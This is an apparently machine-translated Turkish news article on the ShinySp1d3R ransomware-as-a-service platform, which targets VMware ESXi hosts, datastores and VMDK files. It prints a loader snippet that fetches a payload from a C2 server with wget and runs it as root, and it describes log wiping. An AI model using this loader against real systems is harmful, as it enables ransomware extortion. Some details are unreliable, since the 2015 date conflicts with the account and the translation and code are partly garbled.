2015 ortalarında ortaya çıkan Shinysp1d3R Hizmet Olarak Fidye Yazılımı (RAAS) platformu, bulut odaklı gasp araçlarının bir sonraki evrimini temsil eder.
Windows uç noktalarını veya ağ dosyası paylaşımlarını hedefleyen geleneksel fidye yazılımlarının aksine, Shinysp1d3R özellikle VMware ESXI hipervizörlerini ve ekli veri depolarını enfekte etmek ve şifrelemek için tasarlanmıştır.
Erken dağıtımlar iki aşamalı bir yük dağıtımını göstermiştir: başlangıç erişiminin güvenliği ihlal edilmiş SSO kimlik bilgileri veya SSH tuşları ile kazanılır, ardından ESXI kümelerine yanal olarak yayılan ikincil bir modül.
Mağdurlar, konuşlandırıldıktan sonra, fidye yazılımının çalışan tüm sanal makineleri numaralandırdığını, anlık görüntü işlevselliğini devre dışı bıraktığını ve her VMDK dosyasının eşzamanlı AES-256 şifrelemesini başlattığını bildiriyor.
.webp)
Projenin kontrol paneli, veri depolarını seçerek, hedefe dosya uzantıları belirleyerek ve ağ kısıtlamasını algılamadan yapılandırarak şifreleme işlemini uyarlamak için bağlı kuruluşlara ayrıntılı seçenekler sunar.
İştirakler gerçek zamanlı ilerlemeyi izleyebilir ve entegre bir sohbet widget’ı kullanarak fidye terimlerini müzakere edebilir.
Hala aktif geliştirme altında olsa da, ShinySP1D3R, aerodinamik yönetim arayüzü ve sağlam hata işleme rutinleri nedeniyle çoklu yeraltı forumlarından zaten ilgi çekti, bu da kısmi şifrelemelerin hizmet kesintilerinden sonra otomatik olarak devam edebileceğini sağladı.
Eclecticiq analistleri, ShinySP1D3R’nin mevcut Shinyhunters altyapısından ve bağlı kuruluş ağlarından, olgunlaştıktan sonra kurban tabanını hızla genişletmek için hazırlandığını gözlemledi.
İşlevsel olarak, Shinysp1d3R’nin mimarisi hafif bir yükleyici ve tam özellikli bir şifreleme arka plan programından oluşur.
.webp)
Yükleyici, ESXI ana bilgisayarlarını SSH veya API çağrıları yoluyla enfekte eden, bellekte arka planı aşamalı olarak ve diske dosya yazmadan yürütmeyi tetikleyen konumdan bağımsız bir kabuk komut dosyasıdır.
Daemon daha sonra her bir veri deposunu özel kilitlerle monte eder, bellekte tutarlı anlık görüntüleri yakalamak için çalışan VM’leri askıya alır ve gömülü bir GO tabanlı şifreleme ikili yürütür.
Bu ikili, verimi en üst düzeye çıkarmak ve hipervizör performans uyarılarını tetiklemekten kaçınmak için eşzamanlı işçi ipliklerini kullanır.
Enfeksiyon mekanizması
Bağlı kuruluşlar tipik olarak yanlış yapılandırılmış yönetim sunucularından SSH anahtarlarını hasat ederek veya vishing saldırıları yoluyla elde edilen çalıntı SSO tokenlerini kötüye kullanarak enfeksiyonları başlatırlar.
Kimliği doğrulandıktan sonra, yükleyici komut dosyası ESXI ana bilgisayarının yerleşik meşgul kutusu kabuğu kullanılarak dağıtılır. Gerekli ayrıcalıkları kontrol eder, ardından bir C2 sunucusundan ana fidye yazılımı yükünü HTTPS üzerinden getirir.
.webp)
Aşağıdaki snippet, yükleyicinin temel mantığını göstermektedir:-
#!/ bin/ sh
# shinysp1d3r loader for ESXi
C2 = "https[:]//srv[.]affiliateshinysp1d3r[.]com/payload"
TMP = "/tmp/[.]shinyloader"
wget - qO "$TMP" "$C2" && "chmod" + x "$TMP"
# Execute in memory
$TMP --esxi-user root --esxi-pass "$ {ESXI_PASS}"Yürütmeden sonra, yükleyici, denetim izlerini kaldırmak için günlükleri temizler ve Syslog yönlendirmesini harici sunuculara devre dışı bırakır. Daemon daha sonra altındaki her veri deposu yolundan yinelenir. /vmfs/volumesESXI’nın Voma API’sini kullanarak dosyaları kilitler ve yerinde şifreleme uygular.
Hypervisor’ın yerel dosya kilitlemesinden yararlanarak, Shinysp1d3R, hiçbir sanal diskin değiştirilememesini veya geri alınamayacağını sağlar, kurbanları çevrimdışı yedeklemelerden geri yüklemeye veya fidye ödemeye zorlar.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.